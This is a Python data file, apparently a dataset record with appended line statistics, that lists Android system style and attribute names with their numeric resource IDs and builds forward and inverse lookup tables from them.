'fragmentExitTransition' : 16843970,
'fragmentEnterTransition' : 16843971,
'fragmentSharedElementEnterTransition' : 16843972,
'fragmentReturnTransition' : 16843973,
'fragmentSharedElementReturnTransition' : 16843974,
'fragmentReenterTransition' : 16843975,
'fragmentAllowEnterTransitionOverlap' : 16843976,
'fragmentAllowReturnTransitionOverlap' : 16843977,
'patternPathData' : 16843978,
'strokeAlpha' : 16843979,
'fillAlpha' : 16843980,
'windowActivityTransitions' : 16843981,
'colorEdgeEffect' : 16843982
}
}
# Bidirectional lookup tables built from the auto-generated `resources`
# dict above.  For both attributes and styles:
#   "forward": symbolic name -> numeric Android resource ID
#   "inverse": numeric Android resource ID -> symbolic name
# NOTE(review): if two names ever mapped to the same ID, the inverse
# table would silently keep only the last one — presumably IDs are
# unique here, but that is not enforced.
SYSTEM_RESOURCES = {
    "attributes": {
        # dict(d) is the idiomatic shallow copy; the original
        # {k: v for k, v in d.items()} identity comprehension is redundant.
        "forward": dict(resources['attr']),
        "inverse": {v: k for k, v in resources['attr'].items()},
    },
    "styles": {
        "forward": dict(resources['style']),
        "inverse": {v: k for k, v in resources['style'].items()},
    },
}
| 44.947314 | 85 | 0.644051 | resources = {
'style': {
'Animation' : 16973824,
'Animation.Activity' : 16973825,
'Animation.Dialog' : 16973826,
'Animation.InputMethod' : 16973910,
'Animation.Toast' : 16973828,
'Animation.Translucent' : 16973827,
'DeviceDefault.ButtonBar' : 16974287,
'DeviceDefault.ButtonBar.AlertDialog' : 16974288,
'DeviceDefault.Light.ButtonBar' : 16974290,
'DeviceDefault.Light.ButtonBar.AlertDialog' : 16974291,
'DeviceDefault.Light.SegmentedButton' : 16974292,
'DeviceDefault.SegmentedButton' : 16974289,
'Holo.ButtonBar' : 16974053,
'Holo.ButtonBar.AlertDialog' : 16974055,
'Holo.Light.ButtonBar' : 16974054,
'Holo.Light.ButtonBar.AlertDialog' : 16974056,
'Holo.Light.SegmentedButton' : 16974058,
'Holo.SegmentedButton' : 16974057,
'MediaButton' : 16973879,
'MediaButton.Ffwd' : 16973883,
'MediaButton.Next' : 16973881,
'MediaButton.Pause' : 16973885,
'MediaButton.Play' : 16973882,
'MediaButton.Previous' : 16973880,
'MediaButton.Rew' : 16973884,
'TextAppearance' : 16973886,
'TextAppearance.DeviceDefault' : 16974253,
'TextAppearance.DeviceDefault.DialogWindowTitle' : 16974264,
'TextAppearance.DeviceDefault.Inverse' : 16974254,
'TextAppearance.DeviceDefault.Large' : 16974255,
'TextAppearance.DeviceDefault.Large.Inverse' : 16974256,
'TextAppearance.DeviceDefault.Medium' : 16974257,
'TextAppearance.DeviceDefault.Medium.Inverse' : 16974258,
'TextAppearance.DeviceDefault.SearchResult.Subtitle' : 16974262,
'TextAppearance.DeviceDefault.SearchResult.Title' : 16974261,
'TextAppearance.DeviceDefault.Small' : 16974259,
'TextAppearance.DeviceDefault.Small.Inverse' : 16974260,
'TextAppearance.DeviceDefault.Widget' : 16974265,
'TextAppearance.DeviceDefault.Widget.ActionBar.Menu' : 16974286,
'TextAppearance.DeviceDefault.Widget.ActionBar.Subtitle' : 16974279,
'TextAppearance.DeviceDefault.Widget.ActionBar.Subtitle.Inverse' : 16974283,
'TextAppearance.DeviceDefault.Widget.ActionBar.Title' : 16974278,
'TextAppearance.DeviceDefault.Widget.ActionBar.Title.Inverse' : 16974282,
'TextAppearance.DeviceDefault.Widget.ActionMode.Subtitle' : 16974281,
'TextAppearance.DeviceDefault.Widget.ActionMode.Subtitle.Inverse' : 16974285,
'TextAppearance.DeviceDefault.Widget.ActionMode.Title' : 16974280,
'TextAppearance.DeviceDefault.Widget.ActionMode.Title.Inverse' : 16974284,
'TextAppearance.DeviceDefault.Widget.Button' : 16974266,
'TextAppearance.DeviceDefault.Widget.DropDownHint' : 16974271,
'TextAppearance.DeviceDefault.Widget.DropDownItem' : 16974272,
'TextAppearance.DeviceDefault.Widget.EditText' : 16974274,
'TextAppearance.DeviceDefault.Widget.IconMenu.Item' : 16974267,
'TextAppearance.DeviceDefault.Widget.PopupMenu' : 16974275,
'TextAppearance.DeviceDefault.Widget.PopupMenu.Large' : 16974276,
'TextAppearance.DeviceDefault.Widget.PopupMenu.Small' : 16974277,
'TextAppearance.DeviceDefault.Widget.TabWidget' : 16974268,
'TextAppearance.DeviceDefault.Widget.TextView' : 16974269,
'TextAppearance.DeviceDefault.Widget.TextView.PopupMenu' : 16974270,
'TextAppearance.DeviceDefault.Widget.TextView.SpinnerItem' : 16974273,
'TextAppearance.DeviceDefault.WindowTitle' : 16974263,
'TextAppearance.DialogWindowTitle' : 16973889,
'TextAppearance.Holo' : 16974075,
'TextAppearance.Holo.DialogWindowTitle' : 16974103,
'TextAppearance.Holo.Inverse' : 16974076,
'TextAppearance.Holo.Large' : 16974077,
'TextAppearance.Holo.Large.Inverse' : 16974078,
'TextAppearance.Holo.Medium' : 16974079,
'TextAppearance.Holo.Medium.Inverse' : 16974080,
'TextAppearance.Holo.SearchResult.Subtitle' : 16974084,
'TextAppearance.Holo.SearchResult.Title' : 16974083,
'TextAppearance.Holo.Small' : 16974081,
'TextAppearance.Holo.Small.Inverse' : 16974082,
'TextAppearance.Holo.Widget' : 16974085,
'TextAppearance.Holo.Widget.ActionBar.Menu' : 16974112,
'TextAppearance.Holo.Widget.ActionBar.Subtitle' : 16974099,
'TextAppearance.Holo.Widget.ActionBar.Subtitle.Inverse' : 16974109,
'TextAppearance.Holo.Widget.ActionBar.Title' : 16974098,
'TextAppearance.Holo.Widget.ActionBar.Title.Inverse' : 16974108,
'TextAppearance.Holo.Widget.ActionMode.Subtitle' : 16974101,
'TextAppearance.Holo.Widget.ActionMode.Subtitle.Inverse' : 16974111,
'TextAppearance.Holo.Widget.ActionMode.Title' : 16974100,
'TextAppearance.Holo.Widget.ActionMode.Title.Inverse' : 16974110,
'TextAppearance.Holo.Widget.Button' : 16974086,
'TextAppearance.Holo.Widget.DropDownHint' : 16974091,
'TextAppearance.Holo.Widget.DropDownItem' : 16974092,
'TextAppearance.Holo.Widget.EditText' : 16974094,
'TextAppearance.Holo.Widget.IconMenu.Item' : 16974087,
'TextAppearance.Holo.Widget.PopupMenu' : 16974095,
'TextAppearance.Holo.Widget.PopupMenu.Large' : 16974096,
'TextAppearance.Holo.Widget.PopupMenu.Small' : 16974097,
'TextAppearance.Holo.Widget.TabWidget' : 16974088,
'TextAppearance.Holo.Widget.TextView' : 16974089,
'TextAppearance.Holo.Widget.TextView.PopupMenu' : 16974090,
'TextAppearance.Holo.Widget.TextView.SpinnerItem' : 16974093,
'TextAppearance.Holo.WindowTitle' : 16974102,
'TextAppearance.Inverse' : 16973887,
'TextAppearance.Large' : 16973890,
'TextAppearance.Large.Inverse' : 16973891,
'TextAppearance.Material' : 16974317,
'TextAppearance.Material.Body1' : 16974320,
'TextAppearance.Material.Body2' : 16974319,
'TextAppearance.Material.Button' : 16974318,
'TextAppearance.Material.Caption' : 16974321,
'TextAppearance.Material.DialogWindowTitle' : 16974322,
'TextAppearance.Material.Display1' : 16974326,
'TextAppearance.Material.Display2' : 16974325,
'TextAppearance.Material.Display3' : 16974324,
'TextAppearance.Material.Display4' : 16974323,
'TextAppearance.Material.Headline' : 16974327,
'TextAppearance.Material.Inverse' : 16974328,
'TextAppearance.Material.Large' : 16974329,
'TextAppearance.Material.Large.Inverse' : 16974330,
'TextAppearance.Material.Medium' : 16974331,
'TextAppearance.Material.Medium.Inverse' : 16974332,
'TextAppearance.Material.Menu' : 16974333,
'TextAppearance.Material.Notification' : 16974334,
'TextAppearance.Material.Notification.Emphasis' : 16974335,
'TextAppearance.Material.Notification.Info' : 16974336,
'TextAppearance.Material.Notification.Line2' : 16974337,
'TextAppearance.Material.Notification.Time' : 16974338,
'TextAppearance.Material.Notification.Title' : 16974339,
'TextAppearance.Material.SearchResult.Subtitle' : 16974340,
'TextAppearance.Material.SearchResult.Title' : 16974341,
'TextAppearance.Material.Small' : 16974342,
'TextAppearance.Material.Small.Inverse' : 16974343,
'TextAppearance.Material.Subhead' : 16974344,
'TextAppearance.Material.Title' : 16974345,
'TextAppearance.Material.Widget' : 16974347,
'TextAppearance.Material.Widget.ActionBar.Menu' : 16974348,
'TextAppearance.Material.Widget.ActionBar.Subtitle' : 16974349,
'TextAppearance.Material.Widget.ActionBar.Subtitle.Inverse' : 16974350,
'TextAppearance.Material.Widget.ActionBar.Title' : 16974351,
'TextAppearance.Material.Widget.ActionBar.Title.Inverse' : 16974352,
'TextAppearance.Material.Widget.ActionMode.Subtitle' : 16974353,
'TextAppearance.Material.Widget.ActionMode.Subtitle.Inverse' : 16974354,
'TextAppearance.Material.Widget.ActionMode.Title' : 16974355,
'TextAppearance.Material.Widget.ActionMode.Title.Inverse' : 16974356,
'TextAppearance.Material.Widget.Button' : 16974357,
'TextAppearance.Material.Widget.DropDownHint' : 16974358,
'TextAppearance.Material.Widget.DropDownItem' : 16974359,
'TextAppearance.Material.Widget.EditText' : 16974360,
'TextAppearance.Material.Widget.IconMenu.Item' : 16974361,
'TextAppearance.Material.Widget.PopupMenu' : 16974362,
'TextAppearance.Material.Widget.PopupMenu.Large' : 16974363,
'TextAppearance.Material.Widget.PopupMenu.Small' : 16974364,
'TextAppearance.Material.Widget.TabWidget' : 16974365,
'TextAppearance.Material.Widget.TextView' : 16974366,
'TextAppearance.Material.Widget.TextView.PopupMenu' : 16974367,
'TextAppearance.Material.Widget.TextView.SpinnerItem' : 16974368,
'TextAppearance.Material.Widget.Toolbar.Subtitle' : 16974369,
'TextAppearance.Material.Widget.Toolbar.Title' : 16974370,
'TextAppearance.Material.WindowTitle' : 16974346,
'TextAppearance.Medium' : 16973892,
'TextAppearance.Medium.Inverse' : 16973893,
'TextAppearance.Small' : 16973894,
'TextAppearance.Small.Inverse' : 16973895,
'TextAppearance.StatusBar.EventContent' : 16973927,
'TextAppearance.StatusBar.EventContent.Title' : 16973928,
'TextAppearance.StatusBar.Icon' : 16973926,
'TextAppearance.StatusBar.Title' : 16973925,
'TextAppearance.SuggestionHighlight' : 16974104,
'TextAppearance.Theme' : 16973888,
'TextAppearance.Theme.Dialog' : 16973896,
'TextAppearance.Widget' : 16973897,
'TextAppearance.Widget.Button' : 16973898,
'TextAppearance.Widget.DropDownHint' : 16973904,
'TextAppearance.Widget.DropDownItem' : 16973905,
'TextAppearance.Widget.EditText' : 16973900,
'TextAppearance.Widget.IconMenu.Item' : 16973899,
'TextAppearance.Widget.PopupMenu.Large' : 16973952,
'TextAppearance.Widget.PopupMenu.Small' : 16973953,
'TextAppearance.Widget.TabWidget' : 16973901,
'TextAppearance.Widget.TextView' : 16973902,
'TextAppearance.Widget.TextView.PopupMenu' : 16973903,
'TextAppearance.Widget.TextView.SpinnerItem' : 16973906,
'TextAppearance.WindowTitle' : 16973907,
'Theme' : 16973829,
'ThemeOverlay' : 16974407,
'ThemeOverlay.Material' : 16974408,
'ThemeOverlay.Material.ActionBar' : 16974409,
'ThemeOverlay.Material.Dark' : 16974411,
'ThemeOverlay.Material.Dark.ActionBar' : 16974412,
'ThemeOverlay.Material.Light' : 16974410,
'Theme.Black' : 16973832,
'Theme.Black.NoTitleBar' : 16973833,
'Theme.Black.NoTitleBar.Fullscreen' : 16973834,
'Theme.DeviceDefault' : 16974120,
'Theme.DeviceDefault.Dialog' : 16974126,
'Theme.DeviceDefault.DialogWhenLarge' : 16974134,
'Theme.DeviceDefault.DialogWhenLarge.NoActionBar' : 16974135,
'Theme.DeviceDefault.Dialog.MinWidth' : 16974127,
'Theme.DeviceDefault.Dialog.NoActionBar' : 16974128,
'Theme.DeviceDefault.Dialog.NoActionBar.MinWidth' : 16974129,
'Theme.DeviceDefault.InputMethod' : 16974142,
'Theme.DeviceDefault.Light' : 16974123,
'Theme.DeviceDefault.Light.DarkActionBar' : 16974143,
'Theme.DeviceDefault.Light.Dialog' : 16974130,
'Theme.DeviceDefault.Light.DialogWhenLarge' : 16974136,
'Theme.DeviceDefault.Light.DialogWhenLarge.NoActionBar' : 16974137,
'Theme.DeviceDefault.Light.Dialog.MinWidth' : 16974131,
'Theme.DeviceDefault.Light.Dialog.NoActionBar' : 16974132,
'Theme.DeviceDefault.Light.Dialog.NoActionBar.MinWidth' : 16974133,
'Theme.DeviceDefault.Light.NoActionBar' : 16974124,
'Theme.DeviceDefault.Light.NoActionBar.Fullscreen' : 16974125,
'Theme.DeviceDefault.Light.NoActionBar.Overscan' : 16974304,
'Theme.DeviceDefault.Light.NoActionBar.TranslucentDecor' : 16974308,
'Theme.DeviceDefault.Light.Panel' : 16974139,
'Theme.DeviceDefault.NoActionBar' : 16974121,
'Theme.DeviceDefault.NoActionBar.Fullscreen' : 16974122,
'Theme.DeviceDefault.NoActionBar.Overscan' : 16974303,
'Theme.DeviceDefault.NoActionBar.TranslucentDecor' : 16974307,
'Theme.DeviceDefault.Panel' : 16974138,
'Theme.DeviceDefault.Settings' : 16974371,
'Theme.DeviceDefault.Wallpaper' : 16974140,
'Theme.DeviceDefault.Wallpaper.NoTitleBar' : 16974141,
'Theme.Dialog' : 16973835,
'Theme.Holo' : 16973931,
'Theme.Holo.Dialog' : 16973935,
'Theme.Holo.DialogWhenLarge' : 16973943,
'Theme.Holo.DialogWhenLarge.NoActionBar' : 16973944,
'Theme.Holo.Dialog.MinWidth' : 16973936,
'Theme.Holo.Dialog.NoActionBar' : 16973937,
'Theme.Holo.Dialog.NoActionBar.MinWidth' : 16973938,
'Theme.Holo.InputMethod' : 16973951,
'Theme.Holo.Light' : 16973934,
'Theme.Holo.Light.DarkActionBar' : 16974105,
'Theme.Holo.Light.Dialog' : 16973939,
'Theme.Holo.Light.DialogWhenLarge' : 16973945,
'Theme.Holo.Light.DialogWhenLarge.NoActionBar' : 16973946,
'Theme.Holo.Light.Dialog.MinWidth' : 16973940,
'Theme.Holo.Light.Dialog.NoActionBar' : 16973941,
'Theme.Holo.Light.Dialog.NoActionBar.MinWidth' : 16973942,
'Theme.Holo.Light.NoActionBar' : 16974064,
'Theme.Holo.Light.NoActionBar.Fullscreen' : 16974065,
'Theme.Holo.Light.NoActionBar.Overscan' : 16974302,
'Theme.Holo.Light.NoActionBar.TranslucentDecor' : 16974306,
'Theme.Holo.Light.Panel' : 16973948,
'Theme.Holo.NoActionBar' : 16973932,
'Theme.Holo.NoActionBar.Fullscreen' : 16973933,
'Theme.Holo.NoActionBar.Overscan' : 16974301,
'Theme.Holo.NoActionBar.TranslucentDecor' : 16974305,
'Theme.Holo.Panel' : 16973947,
'Theme.Holo.Wallpaper' : 16973949,
'Theme.Holo.Wallpaper.NoTitleBar' : 16973950,
'Theme.InputMethod' : 16973908,
'Theme.Light' : 16973836,
'Theme.Light.NoTitleBar' : 16973837,
'Theme.Light.NoTitleBar.Fullscreen' : 16973838,
'Theme.Light.Panel' : 16973914,
'Theme.Light.WallpaperSettings' : 16973922,
'Theme.Material' : 16974372,
'Theme.Material.Dialog' : 16974373,
'Theme.Material.DialogWhenLarge' : 16974379,
'Theme.Material.DialogWhenLarge.NoActionBar' : 16974380,
'Theme.Material.Dialog.Alert' : 16974374,
'Theme.Material.Dialog.MinWidth' : 16974375,
'Theme.Material.Dialog.NoActionBar' : 16974376,
'Theme.Material.Dialog.NoActionBar.MinWidth' : 16974377,
'Theme.Material.Dialog.Presentation' : 16974378,
'Theme.Material.InputMethod' : 16974381,
'Theme.Material.Light' : 16974391,
'Theme.Material.Light.DarkActionBar' : 16974392,
'Theme.Material.Light.Dialog' : 16974393,
'Theme.Material.Light.DialogWhenLarge' : 16974399,
'Theme.Material.Light.DialogWhenLarge.NoActionBar' : 16974400,
'Theme.Material.Light.Dialog.Alert' : 16974394,
'Theme.Material.Light.Dialog.MinWidth' : 16974395,
'Theme.Material.Light.Dialog.NoActionBar' : 16974396,
'Theme.Material.Light.Dialog.NoActionBar.MinWidth' : 16974397,
'Theme.Material.Light.Dialog.Presentation' : 16974398,
'Theme.Material.Light.NoActionBar' : 16974401,
'Theme.Material.Light.NoActionBar.Fullscreen' : 16974402,
'Theme.Material.Light.NoActionBar.Overscan' : 16974403,
'Theme.Material.Light.NoActionBar.TranslucentDecor' : 16974404,
'Theme.Material.Light.Panel' : 16974405,
'Theme.Material.Light.Voice' : 16974406,
'Theme.Material.NoActionBar' : 16974382,
'Theme.Material.NoActionBar.Fullscreen' : 16974383,
'Theme.Material.NoActionBar.Overscan' : 16974384,
'Theme.Material.NoActionBar.TranslucentDecor' : 16974385,
'Theme.Material.Panel' : 16974386,
'Theme.Material.Settings' : 16974387,
'Theme.Material.Voice' : 16974388,
'Theme.Material.Wallpaper' : 16974389,
'Theme.Material.Wallpaper.NoTitleBar' : 16974390,
'Theme.NoDisplay' : 16973909,
'Theme.NoTitleBar' : 16973830,
'Theme.NoTitleBar.Fullscreen' : 16973831,
'Theme.NoTitleBar.OverlayActionModes' : 16973930,
'Theme.Panel' : 16973913,
'Theme.Translucent' : 16973839,
'Theme.Translucent.NoTitleBar' : 16973840,
'Theme.Translucent.NoTitleBar.Fullscreen' : 16973841,
'Theme.Wallpaper' : 16973918,
'Theme.WallpaperSettings' : 16973921,
'Theme.Wallpaper.NoTitleBar' : 16973919,
'Theme.Wallpaper.NoTitleBar.Fullscreen' : 16973920,
'Theme.WithActionBar' : 16973929,
'Widget' : 16973842,
'Widget.AbsListView' : 16973843,
'Widget.ActionBar' : 16973954,
'Widget.ActionBar.TabBar' : 16974068,
'Widget.ActionBar.TabText' : 16974067,
'Widget.ActionBar.TabView' : 16974066,
'Widget.ActionButton' : 16973956,
'Widget.ActionButton.CloseMode' : 16973960,
'Widget.ActionButton.Overflow' : 16973959,
'Widget.AutoCompleteTextView' : 16973863,
'Widget.Button' : 16973844,
'Widget.Button.Inset' : 16973845,
'Widget.Button.Small' : 16973846,
'Widget.Button.Toggle' : 16973847,
'Widget.CalendarView' : 16974059,
'Widget.CompoundButton' : 16973848,
'Widget.CompoundButton.CheckBox' : 16973849,
'Widget.CompoundButton.RadioButton' : 16973850,
'Widget.CompoundButton.Star' : 16973851,
'Widget.DatePicker' : 16974062,
'Widget.DeviceDefault' : 16974144,
'Widget.DeviceDefault.ActionBar' : 16974187,
'Widget.DeviceDefault.ActionBar.Solid' : 16974195,
'Widget.DeviceDefault.ActionBar.TabBar' : 16974194,
'Widget.DeviceDefault.ActionBar.TabText' : 16974193,
'Widget.DeviceDefault.ActionBar.TabView' : 16974192,
'Widget.DeviceDefault.ActionButton' : 16974182,
'Widget.DeviceDefault.ActionButton.CloseMode' : 16974186,
'Widget.DeviceDefault.ActionButton.Overflow' : 16974183,
'Widget.DeviceDefault.ActionButton.TextButton' : 16974184,
'Widget.DeviceDefault.ActionMode' : 16974185,
'Widget.DeviceDefault.AutoCompleteTextView' : 16974151,
'Widget.DeviceDefault.Button' : 16974145,
'Widget.DeviceDefault.Button.Borderless' : 16974188,
'Widget.DeviceDefault.Button.Borderless.Small' : 16974149,
'Widget.DeviceDefault.Button.Inset' : 16974147,
'Widget.DeviceDefault.Button.Small' : 16974146,
'Widget.DeviceDefault.Button.Toggle' : 16974148,
'Widget.DeviceDefault.CalendarView' : 16974190,
'Widget.DeviceDefault.CheckedTextView' : 16974299,
'Widget.DeviceDefault.CompoundButton.CheckBox' : 16974152,
'Widget.DeviceDefault.CompoundButton.RadioButton' : 16974169,
'Widget.DeviceDefault.CompoundButton.Star' : 16974173,
'Widget.DeviceDefault.DatePicker' : 16974191,
'Widget.DeviceDefault.DropDownItem' : 16974177,
'Widget.DeviceDefault.DropDownItem.Spinner' : 16974178,
'Widget.DeviceDefault.EditText' : 16974154,
'Widget.DeviceDefault.ExpandableListView' : 16974155,
'Widget.DeviceDefault.FastScroll' : 16974313,
'Widget.DeviceDefault.GridView' : 16974156,
'Widget.DeviceDefault.HorizontalScrollView' : 16974171,
'Widget.DeviceDefault.ImageButton' : 16974157,
'Widget.DeviceDefault.Light' : 16974196,
'Widget.DeviceDefault.Light.ActionBar' : 16974243,
'Widget.DeviceDefault.Light.ActionBar.Solid' : 16974247,
'Widget.DeviceDefault.Light.ActionBar.Solid.Inverse' : 16974248,
'Widget.DeviceDefault.Light.ActionBar.TabBar' : 16974246,
'Widget.DeviceDefault.Light.ActionBar.TabBar.Inverse' : 16974249,
'Widget.DeviceDefault.Light.ActionBar.TabText' : 16974245,
'Widget.DeviceDefault.Light.ActionBar.TabText.Inverse' : 16974251,
'Widget.DeviceDefault.Light.ActionBar.TabView' : 16974244,
'Widget.DeviceDefault.Light.ActionBar.TabView.Inverse' : 16974250,
'Widget.DeviceDefault.Light.ActionButton' : 16974239,
'Widget.DeviceDefault.Light.ActionButton.CloseMode' : 16974242,
'Widget.DeviceDefault.Light.ActionButton.Overflow' : 16974240,
'Widget.DeviceDefault.Light.ActionMode' : 16974241,
'Widget.DeviceDefault.Light.ActionMode.Inverse' : 16974252,
'Widget.DeviceDefault.Light.AutoCompleteTextView' : 16974203,
'Widget.DeviceDefault.Light.Button' : 16974197,
'Widget.DeviceDefault.Light.Button.Borderless.Small' : 16974201,
'Widget.DeviceDefault.Light.Button.Inset' : 16974199,
'Widget.DeviceDefault.Light.Button.Small' : 16974198,
'Widget.DeviceDefault.Light.Button.Toggle' : 16974200,
'Widget.DeviceDefault.Light.CalendarView' : 16974238,
'Widget.DeviceDefault.Light.CheckedTextView' : 16974300,
'Widget.DeviceDefault.Light.CompoundButton.CheckBox' : 16974204,
'Widget.DeviceDefault.Light.CompoundButton.RadioButton' : 16974224,
'Widget.DeviceDefault.Light.CompoundButton.Star' : 16974228,
'Widget.DeviceDefault.Light.DropDownItem' : 16974232,
'Widget.DeviceDefault.Light.DropDownItem.Spinner' : 16974233,
'Widget.DeviceDefault.Light.EditText' : 16974206,
'Widget.DeviceDefault.Light.ExpandableListView' : 16974207,
'Widget.DeviceDefault.Light.FastScroll' : 16974315,
'Widget.DeviceDefault.Light.GridView' : 16974208,
'Widget.DeviceDefault.Light.HorizontalScrollView' : 16974226,
'Widget.DeviceDefault.Light.ImageButton' : 16974209,
'Widget.DeviceDefault.Light.ListPopupWindow' : 16974235,
'Widget.DeviceDefault.Light.ListView' : 16974210,
'Widget.DeviceDefault.Light.ListView.DropDown' : 16974205,
'Widget.DeviceDefault.Light.MediaRouteButton' : 16974296,
'Widget.DeviceDefault.Light.PopupMenu' : 16974236,
'Widget.DeviceDefault.Light.PopupWindow' : 16974211,
'Widget.DeviceDefault.Light.ProgressBar' : 16974212,
'Widget.DeviceDefault.Light.ProgressBar.Horizontal' : 16974213,
'Widget.DeviceDefault.Light.ProgressBar.Inverse' : 16974217,
'Widget.DeviceDefault.Light.ProgressBar.Large' : 16974216,
'Widget.DeviceDefault.Light.ProgressBar.Large.Inverse' : 16974219,
'Widget.DeviceDefault.Light.ProgressBar.Small' : 16974214,
'Widget.DeviceDefault.Light.ProgressBar.Small.Inverse' : 16974218,
'Widget.DeviceDefault.Light.ProgressBar.Small.Title' : 16974215,
'Widget.DeviceDefault.Light.RatingBar' : 16974221,
'Widget.DeviceDefault.Light.RatingBar.Indicator' : 16974222,
'Widget.DeviceDefault.Light.RatingBar.Small' : 16974223,
'Widget.DeviceDefault.Light.ScrollView' : 16974225,
'Widget.DeviceDefault.Light.SeekBar' : 16974220,
'Widget.DeviceDefault.Light.Spinner' : 16974227,
'Widget.DeviceDefault.Light.StackView' : 16974316,
'Widget.DeviceDefault.Light.Tab' : 16974237,
'Widget.DeviceDefault.Light.TabWidget' : 16974229,
'Widget.DeviceDefault.Light.TextView' : 16974202,
'Widget.DeviceDefault.Light.TextView.SpinnerItem' : 16974234,
'Widget.DeviceDefault.Light.WebTextView' : 16974230,
'Widget.DeviceDefault.Light.WebView' : 16974231,
'Widget.DeviceDefault.ListPopupWindow' : 16974180,
'Widget.DeviceDefault.ListView' : 16974158,
'Widget.DeviceDefault.ListView.DropDown' : 16974153,
'Widget.DeviceDefault.MediaRouteButton' : 16974295,
'Widget.DeviceDefault.PopupMenu' : 16974181,
'Widget.DeviceDefault.PopupWindow' : 16974159,
'Widget.DeviceDefault.ProgressBar' : 16974160,
'Widget.DeviceDefault.ProgressBar.Horizontal' : 16974161,
'Widget.DeviceDefault.ProgressBar.Large' : 16974164,
'Widget.DeviceDefault.ProgressBar.Small' : 16974162,
'Widget.DeviceDefault.ProgressBar.Small.Title' : 16974163,
'Widget.DeviceDefault.RatingBar' : 16974166,
'Widget.DeviceDefault.RatingBar.Indicator' : 16974167,
'Widget.DeviceDefault.RatingBar.Small' : 16974168,
'Widget.DeviceDefault.ScrollView' : 16974170,
'Widget.DeviceDefault.SeekBar' : 16974165,
'Widget.DeviceDefault.Spinner' : 16974172,
'Widget.DeviceDefault.StackView' : 16974314,
'Widget.DeviceDefault.Tab' : 16974189,
'Widget.DeviceDefault.TabWidget' : 16974174,
'Widget.DeviceDefault.TextView' : 16974150,
'Widget.DeviceDefault.TextView.SpinnerItem' : 16974179,
'Widget.DeviceDefault.WebTextView' : 16974175,
'Widget.DeviceDefault.WebView' : 16974176,
'Widget.DropDownItem' : 16973867,
'Widget.DropDownItem.Spinner' : 16973868,
'Widget.EditText' : 16973859,
'Widget.ExpandableListView' : 16973860,
'Widget.FastScroll' : 16974309,
'Widget.FragmentBreadCrumbs' : 16973961,
'Widget.Gallery' : 16973877,
'Widget.GridView' : 16973874,
'Widget.Holo' : 16973962,
'Widget.Holo.ActionBar' : 16974004,
'Widget.Holo.ActionBar.Solid' : 16974113,
'Widget.Holo.ActionBar.TabBar' : 16974071,
'Widget.Holo.ActionBar.TabText' : 16974070,
'Widget.Holo.ActionBar.TabView' : 16974069,
'Widget.Holo.ActionButton' : 16973999,
'Widget.Holo.ActionButton.CloseMode' : 16974003,
'Widget.Holo.ActionButton.Overflow' : 16974000,
'Widget.Holo.ActionButton.TextButton' : 16974001,
'Widget.Holo.ActionMode' : 16974002,
'Widget.Holo.AutoCompleteTextView' : 16973968,
'Widget.Holo.Button' : 16973963,
'Widget.Holo.Button.Borderless' : 16974050,
'Widget.Holo.Button.Borderless.Small' : 16974106,
'Widget.Holo.Button.Inset' : 16973965,
'Widget.Holo.Button.Small' : 16973964,
'Widget.Holo.Button.Toggle' : 16973966,
'Widget.Holo.CalendarView' : 16974060,
'Widget.Holo.CheckedTextView' : 16974297,
'Widget.Holo.CompoundButton.CheckBox' : 16973969,
'Widget.Holo.CompoundButton.RadioButton' : 16973986,
'Widget.Holo.CompoundButton.Star' : 16973990,
'Widget.Holo.DatePicker' : 16974063,
'Widget.Holo.DropDownItem' : 16973994,
'Widget.Holo.DropDownItem.Spinner' : 16973995,
'Widget.Holo.EditText' : 16973971,
'Widget.Holo.ExpandableListView' : 16973972,
'Widget.Holo.GridView' : 16973973,
'Widget.Holo.HorizontalScrollView' : 16973988,
'Widget.Holo.ImageButton' : 16973974,
'Widget.Holo.Light' : 16974005,
'Widget.Holo.Light.ActionBar' : 16974049,
'Widget.Holo.Light.ActionBar.Solid' : 16974114,
'Widget.Holo.Light.ActionBar.Solid.Inverse' : 16974115,
'Widget.Holo.Light.ActionBar.TabBar' : 16974074,
'Widget.Holo.Light.ActionBar.TabBar.Inverse' : 16974116,
'Widget.Holo.Light.ActionBar.TabText' : 16974073,
'Widget.Holo.Light.ActionBar.TabText.Inverse' : 16974118,
'Widget.Holo.Light.ActionBar.TabView' : 16974072,
'Widget.Holo.Light.ActionBar.TabView.Inverse' : 16974117,
'Widget.Holo.Light.ActionButton' : 16974045,
'Widget.Holo.Light.ActionButton.CloseMode' : 16974048,
'Widget.Holo.Light.ActionButton.Overflow' : 16974046,
'Widget.Holo.Light.ActionMode' : 16974047,
'Widget.Holo.Light.ActionMode.Inverse' : 16974119,
'Widget.Holo.Light.AutoCompleteTextView' : 16974011,
'Widget.Holo.Light.Button' : 16974006,
'Widget.Holo.Light.Button.Borderless.Small' : 16974107,
'Widget.Holo.Light.Button.Inset' : 16974008,
'Widget.Holo.Light.Button.Small' : 16974007,
'Widget.Holo.Light.Button.Toggle' : 16974009,
'Widget.Holo.Light.CalendarView' : 16974061,
'Widget.Holo.Light.CheckedTextView' : 16974298,
'Widget.Holo.Light.CompoundButton.CheckBox' : 16974012,
'Widget.Holo.Light.CompoundButton.RadioButton' : 16974032,
'Widget.Holo.Light.CompoundButton.Star' : 16974036,
'Widget.Holo.Light.DropDownItem' : 16974040,
'Widget.Holo.Light.DropDownItem.Spinner' : 16974041,
'Widget.Holo.Light.EditText' : 16974014,
'Widget.Holo.Light.ExpandableListView' : 16974015,
'Widget.Holo.Light.GridView' : 16974016,
'Widget.Holo.Light.HorizontalScrollView' : 16974034,
'Widget.Holo.Light.ImageButton' : 16974017,
'Widget.Holo.Light.ListPopupWindow' : 16974043,
'Widget.Holo.Light.ListView' : 16974018,
'Widget.Holo.Light.ListView.DropDown' : 16974013,
'Widget.Holo.Light.MediaRouteButton' : 16974294,
'Widget.Holo.Light.PopupMenu' : 16974044,
'Widget.Holo.Light.PopupWindow' : 16974019,
'Widget.Holo.Light.ProgressBar' : 16974020,
'Widget.Holo.Light.ProgressBar.Horizontal' : 16974021,
'Widget.Holo.Light.ProgressBar.Inverse' : 16974025,
'Widget.Holo.Light.ProgressBar.Large' : 16974024,
'Widget.Holo.Light.ProgressBar.Large.Inverse' : 16974027,
'Widget.Holo.Light.ProgressBar.Small' : 16974022,
'Widget.Holo.Light.ProgressBar.Small.Inverse' : 16974026,
'Widget.Holo.Light.ProgressBar.Small.Title' : 16974023,
'Widget.Holo.Light.RatingBar' : 16974029,
'Widget.Holo.Light.RatingBar.Indicator' : 16974030,
'Widget.Holo.Light.RatingBar.Small' : 16974031,
'Widget.Holo.Light.ScrollView' : 16974033,
'Widget.Holo.Light.SeekBar' : 16974028,
